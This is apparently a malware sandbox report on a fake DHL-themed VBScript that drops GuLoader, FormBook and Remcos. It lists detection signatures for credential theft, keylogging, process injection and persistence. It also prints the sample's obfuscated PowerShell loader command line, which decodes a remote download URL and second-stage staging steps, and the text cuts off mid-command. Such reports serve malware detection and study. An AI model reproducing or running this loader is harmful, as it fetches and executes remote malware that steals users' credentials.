Edit tour
Windows
Analysis Report
DHL_ES567436735845755676678877988975877.vbs
Overview
General Information
Detection
FormBook, GuLoader, Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
Yara detected GuLoader
Yara detected Remcos RAT
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Installs a global keyboard hook
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Sigma detected: Wab/Wabmig Unusual Parent Or Child Processes
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses cmd line tools excessively to alter registry or file data
Uses dynamic DNS services
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Direct Autorun Keys Modification
Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE
Sigma detected: Suspicious Powershell In Registry Run Keys
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sleep loop found (likely to delay execution)
Uses code obfuscation techniques (call, push, ret)
Uses reg.exe to modify the Windows registry
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
- wscript.exe (PID: 1992 cmdline:
C:\Windows \System32\ WScript.ex e "C:\User s\user\Des ktop\DHL_E S567436735 8457556766 7887798897 5877.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80) - powershell.exe (PID: 2132 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" "$gdnings = 1;$Tripe talous='S' ;$Tripetal ous+='ubst rin';$Trip etalous+=' g';Functio n Teucrium ($Gdskes){ $Expirable =$Gdskes.L ength-$gdn ings;For($ Heltemodig es=4; $Hel temodiges -lt $Expir able; $Hel temodiges+ =(5)){$Mir akeldoktor erne+=$Gds kes.$Tripe talous.Inv oke($Helte modiges, $ gdnings);} $Mirakeldo ktorerne;} function R egulerbare ($Reticula ria){& ($Bestandi gst) ($Ret icularia); }$Planlgge lserne235= Teucrium ' LeopMC,mpo Croz Frei Prpol.hril M rgaBri / Pree5 C r. Hex0Pl n Embr( ha,W Po iHemon .lgndPreeo eksw,olis Sttt ,ppNu pt T Yie R ed1ud.i0 M ul.Fodb0 S ka; Skr As suWByttiOv ernSe.s6.o ti4El.x; T re DepexWh is6U mo4 D e,;Vsk, Al ir,entv St t:.aus1,es u2 Pic1Fag b.Cryp0 M t)W.tc D.l gGOpree np cTrickStig oSkgg/,jle 2 Kry0 Me 1S lt0Stoc 0Cruo1Frkk 0Sahu1Skru KontFSkan iPertrUpcr e Kiaf Val oNdrixLavr /Konv1Floc 2Scou1Appl .,ont0Stru ';$improv ers=Teucri um 'ArbeUD oubsTaleeP ianrTarv-, rogATwitgS clae P.lnt e stKlas ' ;$Ovariect omize=Teuc rium 'A rt hSemit Mas tSuffpDykk sNonp: Saa /Nedj/Orto eGensu Lym rjyd.oPime pBegirNgom oF,rst Jer e,agncanst t FidiSoci eVir,. T s r.fproCh.r /GlasMTri, e CiktArb, hmargiSemi n AaskNice 1phle. Tak tNonrhKdls nOver ';$A stor=Teucr ium 'Nonf> nd ';$Bes tandigst=T eucrium ' PleiL.doeS p,lxSkit ' ;$Executry 203='smitt efaren';Re gulerbare (Teucrium 'pugiSTeco ePelstDeta -ventCFl.l oDelinIndd tPrepeTilb nFreet Taa Lill-Ex.e PBehea.pso t Ab hPeri RakeT K,o :Gemm\Adju NTartvBoss n oce Matl Temps,obbe eu,o. Fort EpipxEstht Bifr Whis- GarbV Refa Tor lUndeu BoreeHyl P ier$BlysE remxRe.peB igacDionuB nsktNonsr A,kyDoci2N edv0Term3r ,ma; Men ' );Regulerb are (Teucr ium 'Untri Ov.fHaem Sal,(Tudbt Brue Kuns app tZebr- alpNo sa .irt O qh Bi NoneTGe rm:Ecot\Re pNdor v S ton Mone A celToilsAg roeAfsk.Tr e.tFro x D eptHjlp)Eu ph{QuiceAf syxKvadiTe .rtSqui}M, le;Mi.l ') ;$Tearines s = Teucri um 'FrereD ynecScrahi mp.o Gid b rul%.ddea, uffp Hi pF ilhdMadnaN i,at Ma,aS kum%Ha g\B eavPOv rr NoleDiscs Mani iklgD iagnPappa t,slVed 2S hir3Bu g.s yndH,alla Konl Uni F l,&Pose&Ea te BylieBi llcAfhohPa nto Kns Ve s$tota '; Regulerbar e (Teucriu m 'P.lu$C. shgMa,tlAb onoEnthbAs peaUsorlK ap:Fores T imu Av,bAn ri Alinra m,sOprre F rerConjtSp ariUn coCr onnKass= T ek(Sprnc K remDertdM. lj Felt/ H aycMerc Ov er$romeT , rleLeveaSc rur Pa.i M isnKalde o rrsRaglsBe wh)Wamu ') ;Regulerba re (Teucri um 'Sku,$H avigAcrolD .inoVipebL mlea banlM rk: EarTD iobaWeevaU dbyl Ly mA ffao F,rdB ,rti C,ag Spkh Udse. ndbdAmin= Con$ tevOC arov.atra OdorPolyiR epreOvercT ordtSor.oS torm acciB e,nzSamdeB ybu.Mil,sr ek.pr onlD hoti usttL ivs(afsk$ .obA RegsB